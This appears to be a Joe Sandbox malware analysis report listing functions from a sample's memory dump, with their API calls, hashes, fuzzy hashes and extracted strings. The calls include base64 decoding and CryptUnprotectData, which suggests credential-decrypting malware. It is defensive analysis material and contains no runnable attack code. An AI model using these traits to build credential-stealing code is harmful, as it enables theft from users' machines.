                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptString
                              • String ID:
                              • API String ID: 80407269-0
                              • Opcode ID: 82b0d5485494e6a6cc2e784371c42da060a7a89b35c8e596adaf56307e6babd8
                              • Instruction ID: 7a21b8ce29f47e9c068e362a5d468760735ccacea5f86b5f6aa31d0ebbe5e4da
                              • Opcode Fuzzy Hash: 82b0d5485494e6a6cc2e784371c42da060a7a89b35c8e596adaf56307e6babd8
                              • Instruction Fuzzy Hash: AA11E274200309BFDB04CFA4E889FAB37AEAF89714F109558F9198B250DB76ED41DB60
                              Function 00129AC0 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                              Download Yara Rule
                              APIs
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00124EEE,00000000,00000000), ref: 00129AEF
                              • LocalAlloc.KERNEL32(00000040,?,?,?,00124EEE,00000000,?), ref: 00129B01
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00124EEE,00000000,00000000), ref: 00129B2A
                              • LocalFree.KERNEL32(?,?,?,?,00124EEE,00000000,?), ref: 00129B3F
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptLocalString$AllocFree
                              • String ID:
                              • API String ID: 4291131564-0
                              • Opcode ID: 31e1e5215006a41b034c6a192635eb2be9acf8aa2e31febbe45b411cdda9331c
                              • Instruction ID: 67ed3dafb67d0a7fedddcb1e82be47ae590effd6e0680059dc5d6bfbb7d2511b
                              • Opcode Fuzzy Hash: 31e1e5215006a41b034c6a192635eb2be9acf8aa2e31febbe45b411cdda9331c
                              • Instruction Fuzzy Hash: 1111A4B4240208AFEB11CF64DC95FAA77B9FB89700F208058F9159B390C7B5A901DB90
                              Function 00137A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00FFE620,00000000,?,00140E10,00000000,?,00000000,00000000), ref: 00137A63
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00137A6A
                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00FFE620,00000000,?,00140E10,00000000,?,00000000,00000000,?), ref: 00137A7D
                              • wsprintfA.USER32 ref: 00137AB7
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                              • String ID:
                              • API String ID: 3317088062-0
                              • Opcode ID: 07dbd31f6fe09f204cf9fabaa7cb539cf27b7649d478801fb2e43ac2c60c1f38
                              • Instruction ID: fc0b8ddb439fc33d1b45ecd01425a5b76859a9b5b7cb31ea09802831848f10bc
                              • Opcode Fuzzy Hash: 07dbd31f6fe09f204cf9fabaa7cb539cf27b7649d478801fb2e43ac2c60c1f38
                              • Instruction Fuzzy Hash: 8A118EB1945618EBEB208B54DC49FA9BBB8FB04721F10479AE90AA32C0C7741A40CF51
                              Function 004E3EDF Relevance: 5.9, Strings: 4, Instructions: 931COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: B_w$`bw{$q+,$u%>I
                              • API String ID: 0-1763919940
                              • Opcode ID: b14f048a9064c45e76387ea2ee3b44a033d2bc9f94c8e1d01dd941dc2fcd3838
                              • Instruction ID: c35c07104c3b618c672736fcf21167e2582b1d968f1678ee3491be6f935f9edd
                              • Opcode Fuzzy Hash: b14f048a9064c45e76387ea2ee3b44a033d2bc9f94c8e1d01dd941dc2fcd3838
                              • Instruction Fuzzy Hash: CF52F8F360C2049FE704AE2DEC8567AB7E9EB94320F168A3DE6C5C3744E63598058697
                              Function 004EBB7A Relevance: 5.4, Strings: 3, Instructions: 1657COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 1&:/$Q{_$t49}
                              • API String ID: 0-3721954467
                              • Opcode ID: c8649177da497b9ff7bda3921e868ad952610abb6b5eae5ad9ac3f78659d95cc
                              • Instruction ID: e6f4996abb6025ec58a3d5fe511eb3658fbcebebd60443b5f4271dd5a5095718
                              • Opcode Fuzzy Hash: c8649177da497b9ff7bda3921e868ad952610abb6b5eae5ad9ac3f78659d95cc
                              • Instruction Fuzzy Hash: 2BB22AF3A082049FE304AE2DEC8567ABBE6EFD4720F1A453DE6C4C7744EA3558058697
                              Function 004F0D0D Relevance: 5.4, Strings: 3, Instructions: 1634COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 2*O$E>}D$~p.
                              • API String ID: 0-1836780756
                              • Opcode ID: 664d2ae31339c961b8e9fe6ae22e13743eca4a7c2aafda7c3c4e096c038e020f
                              • Instruction ID: eedba23a93f1d87ddc373040d7a5c8dc183887d5fb6451470e05f3b3785af908
                              • Opcode Fuzzy Hash: 664d2ae31339c961b8e9fe6ae22e13743eca4a7c2aafda7c3c4e096c038e020f
                              • Instruction Fuzzy Hash: 37B2D5F360C210AFE3146E29EC8567ABBE9EF94720F1A493DE6C4C3744EA3548458797
                              Function 004E50AC Relevance: 5.4, Strings: 3, Instructions: 1609COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: U\?]$zWW$;zN
                              • API String ID: 0-2559165817
                              • Opcode ID: 178a90f82a3d6145a6ca01c774146b21f4e1599e3a6db518bd1e3fc34e7a6e7a
                              • Instruction ID: 9819c0a73aafeab96a336697606d16a3de4457a6a62f2d93551bc9ddac856d1b
                              • Opcode Fuzzy Hash: 178a90f82a3d6145a6ca01c774146b21f4e1599e3a6db518bd1e3fc34e7a6e7a
                              • Instruction Fuzzy Hash: 77B23AF3A082149FE3046E2DEC8567AFBE9EFD4320F1A853EEAC4D3744E53558058696
                              Function 004FB047 Relevance: 5.1, Strings: 3, Instructions: 1314COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: _Zk$rez$%[u
                              • API String ID: 0-431288570
                              • Opcode ID: e61b88d9041dc11153ea2ff9407be1dce59acfb1a474f1c8d0da78c16f563ae4
                              • Instruction ID: a5e73983989669365d263a8c8f5af4b378cb97a97e7432f57341b7a64fcad66f
                              • Opcode Fuzzy Hash: e61b88d9041dc11153ea2ff9407be1dce59acfb1a474f1c8d0da78c16f563ae4
                              • Instruction Fuzzy Hash: 489239F3A086049FE304AE2DDC8567AFBE5EF94720F1A893DEAC4C7744E63558058693
                              Function 00133720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                              Download Yara Rule
                              APIs
                              • CoCreateInstance.COMBASE(0013E118,00000000,00000001,0013E108,00000000), ref: 00133758
                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 001337B0
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharCreateInstanceMultiWide
                              • String ID:
                              • API String ID: 123533781-0
                              • Opcode ID: 07454e2132b0b92d1914b5b57545cdca4c3ee7b922c021d05b06dd4b5292ff45
                              • Instruction ID: e1f689fa069158809c4d53d1e8600c956cc7fc5397f1e1b0ea5e8f3b9c9138ab
                              • Opcode Fuzzy Hash: 07454e2132b0b92d1914b5b57545cdca4c3ee7b922c021d05b06dd4b5292ff45
                              • Instruction Fuzzy Hash: F741C970A40A189FDB24DB58CC95F9BB7B5BB48702F4082D8E619A72D0D7B16E85CF50
                              Function 00129B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00129B84
                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 00129BA3
                              • LocalFree.KERNEL32(?), ref: 00129BD3
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$AllocCryptDataFreeUnprotect
                              • String ID:
                              • API String ID: 2068576380-0
                              • Opcode ID: 272ad570dfece7388f6084ac7dfa5034ecbaf6b4a45aefbf29492b65d201aa03
                              • Instruction ID: b4ae5f285e26388bbacfa44371ec4b899352170e24847bdcc93d557e4e65b866
                              • Opcode Fuzzy Hash: 272ad570dfece7388f6084ac7dfa5034ecbaf6b4a45aefbf29492b65d201aa03
                              • Instruction Fuzzy Hash: 4C11BAB8A00209DFDB05DF98D989EAE77B9FF88300F104558E915A7350D774AE10CFA1
                              Function 004F4DA8 Relevance: 4.5, Strings: 3, Instructions: 721COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: P8BJ$W@xi$'|
                              • API String ID: 0-522130173
                              • Opcode ID: cbb6557f282ab2afd1e003b23ee59edd906bcf8b79764081b6735c607afb5c88
                              • Instruction ID: 231d762a7cd3bce7164dd472397dde4218fd157b4e3b6947c7183fe54e4d889b
                              • Opcode Fuzzy Hash: cbb6557f282ab2afd1e003b23ee59edd906bcf8b79764081b6735c607afb5c88
                              • Instruction Fuzzy Hash: 2F220AF360C2049FE704AE29EC4577ABBE6EBD4320F168A3DE6C4C7744E63598058697
                              Function 004E85BE Relevance: 4.1, Strings: 2, Instructions: 1578COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: _FZ&$t^}?
                              • API String ID: 0-1753847426
                              • Opcode ID: 71554f8134de3ab14d6fb37f8e590b908f1d3c62a9ec63d5b1b3f6dbbb2c8455
                              • Instruction ID: 115cb71315a0e1a78419d5b1120d3f4d8a2be08f00f87f5dab3570a6655d1adb
                              • Opcode Fuzzy Hash: 71554f8134de3ab14d6fb37f8e590b908f1d3c62a9ec63d5b1b3f6dbbb2c8455
                              • Instruction Fuzzy Hash: F2B2F7F3A082009FD3146E2DDC8577AFBE9EF94720F1A4A2DEAC4C7744E63558058697
                              Function 003A71F3 Relevance: 2.7, Strings: 2, Instructions: 190COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: Uo@_$d=/G
                              • API String ID: 0-952508118
                              • Opcode ID: b4ba13db02caf53e63d8efff6033a8893e6982749840d035e2baba7360fef18e
                              • Instruction ID: 11ac09b6bb758cfe8c6cbfde192feabcb4f61fda436f5462e0449ae0940a343e
